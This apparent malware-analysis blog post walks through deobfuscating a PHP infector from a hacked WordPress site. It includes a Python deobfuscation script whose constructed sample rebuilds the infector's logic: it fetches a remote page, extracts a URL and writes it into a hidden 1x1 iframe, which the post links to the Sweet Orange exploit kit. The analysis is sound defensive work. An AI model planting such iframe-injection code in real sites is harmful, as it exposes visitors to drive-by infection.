PHP Infector

A reader wanted me to analyze a PHP file that was found on his hacked WordPress site. The script is made up of three parts as you can see.

[Image: 20131012_01]

The top two sections each define an array of Base64-encoded strings. The bottom section references those arrays by index and performs the main functions.

My first thought was to replace each of the array variables with the actual decoded strings. Then I could read the script at the bottom and figure out what it’s doing. But replacing each of the variable names with the values from the array manually would be a pain! (Anyone got a better idea? If so, let me know.)

Whenever I come across a problem, I try to find a generic solution that I can keep using in the future. Here’s what I came up with…

First I take each of the top two sections and separate the encoded values by rows. So I take this:

[Image: 20131012_02]

And use search/replace to make it look like this:

[Image: 20131012_03]

Then I modified Converter to base64-decode each row separately:

[Image: 20131012_04]

Then I replaced each row with a pipe delimiter (since it wasn’t being used anywhere):

[Image: 20131012_05]

I did the same for the second section:

[Image: 20131012_06]

I wrote a program that does a search and replace of the array values. I entered the search string that corresponded to the top section and pasted in the decoded strings with the pipe delimiter to get the result.

[Image: 20131012_07]

The second section was next.

[Image: 20131012_08]

All done! The resulting script probably won't execute as-is because the substituted strings are dropped in without quotes, but it gives a much better idea of what's going on.
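The whole procedure above (split each array into rows, base64-decode every row, then replace each array reference with its decoded value) can be done in one pass with a short script. What follows is an added example written for this page; it is not the Converter tool and not the reader's infected file. The PHP sample it parses is constructed to mimic the shape described in the post (two base64 string tables and a body that references them by index), and the exact `$name = array("...");` / `$name[N]` syntax it looks for is an assumption about that shape. Unlike the manual search/replace, it emits the decoded values as quoted PHP literals and leaves alone any reference to an array it did not see, such as a regex match array.

```python
import base64
import binascii
import re

# Constructed sample (not the reader's file): two arrays of base64-encoded
# strings and a body that references them by index, as the post describes.
def _b64(s):
    return base64.b64encode(s.encode()).decode()

def _php_array(name, values):
    return '$%s = array(%s);' % (name, ", ".join('"%s"' % _b64(v) for v in values))

SAMPLE_PHP = "\n".join([
    "<?php",
    _php_array("a", ["file_get_contents", "http://example.invalid/get.php", "preg_match"]),
    _php_array("b", ['<iframe src="', '" width=1 height=1></iframe>', '/<a href="(.*?)"/']),
    "$page = $a[0]($a[1]);",
    "$a[2]($b[2], $page, $m);",
    "echo $b[0] . $m[1] . $b[1];",
    "",
])

# $name = array("...", "...");  (assumed syntax; nested arrays are not handled)
ARRAY_RE = re.compile(r'\$(\w+)\s*=\s*array\s*\((.*?)\)\s*;', re.S)
# one single- or double-quoted element with no escape sequences inside it
ELEM_RE = re.compile(r'"([^"\\]*)"|\'([^\'\\]*)\'')
# $name[123]  (literal index only; $a[$i] is left for the reader)
REF_RE = re.compile(r'\$(\w+)\[(\d+)\]')

def decode_element(raw):
    """Base64-decode one array element; keep it verbatim if it is not clean base64 text."""
    try:
        text = base64.b64decode(raw, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return raw
    if not all(c.isprintable() or c.isspace() for c in text):
        return raw  # decodes, but to binary junk: almost certainly not a string element
    return text

def extract_arrays(src):
    """Map each array variable name to the list of its decoded elements, in order."""
    arrays = {}
    for m in ARRAY_RE.finditer(src):
        name, body = m.group(1), m.group(2)
        elems = [e.group(1) if e.group(1) is not None else e.group(2)
                 for e in ELEM_RE.finditer(body)]
        arrays[name] = [decode_element(e) for e in elems]
    return arrays

def php_quote(s):
    """Render a decoded value as a PHP single-quoted literal (only \\ and ' need escaping)."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"

def substitute_refs(body, arrays):
    """Replace $name[N] with the quoted decoded string when $name is a known table."""
    def repl(m):
        name, idx = m.group(1), int(m.group(2))
        values = arrays.get(name)
        if values is None or idx >= len(values):
            return m.group(0)  # not one of the string tables: leave the reference untouched
        return php_quote(values[idx])
    return REF_RE.sub(repl, body)

def deobfuscate(src):
    """Return (rewritten body, decoded tables) for a script in the described shape."""
    arrays = extract_arrays(src)
    body = ARRAY_RE.sub("", src)                    # drop the now-redundant tables
    body = re.sub(r"\n(?:[ \t]*\n)+", "\n", body)   # tidy the blank lines they leave behind
    return substitute_refs(body, arrays), arrays

if __name__ == "__main__":
    out, tables = deobfuscate(SAMPLE_PHP)
    for name, vals in tables.items():
        print("$%s = %r" % (name, vals))
    print(out)
```

On the constructed sample the body comes out as `$page = 'file_get_contents'('http://example.invalid/get.php');`, a `'preg_match'(...)` call, and an `echo` that wraps the match in an iframe, while `$m[1]` survives because `$m` is not one of the decoded tables. The quoted-callable form is for reading, not running; nested arrays, escaped quotes and indices computed at runtime are outside what the regexes parse, so check the output against the original rather than trusting it blindly.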

[Image: 20131012_09]

Basically this fetches a file from a remote website, pulls a URL out of it and writes that URL into an iframe. It essentially serves up a drive-by link to unsuspecting visitors of the infected site.

[Image: 20131012_10]

The iframe link is the landing page of Sweet Orange. The link changes every couple of minutes or so.

I’ll need to think about this more and see if there’s another generic solution. If not, I’ll add this method to Converter in the future.

This entry was posted in Malscript.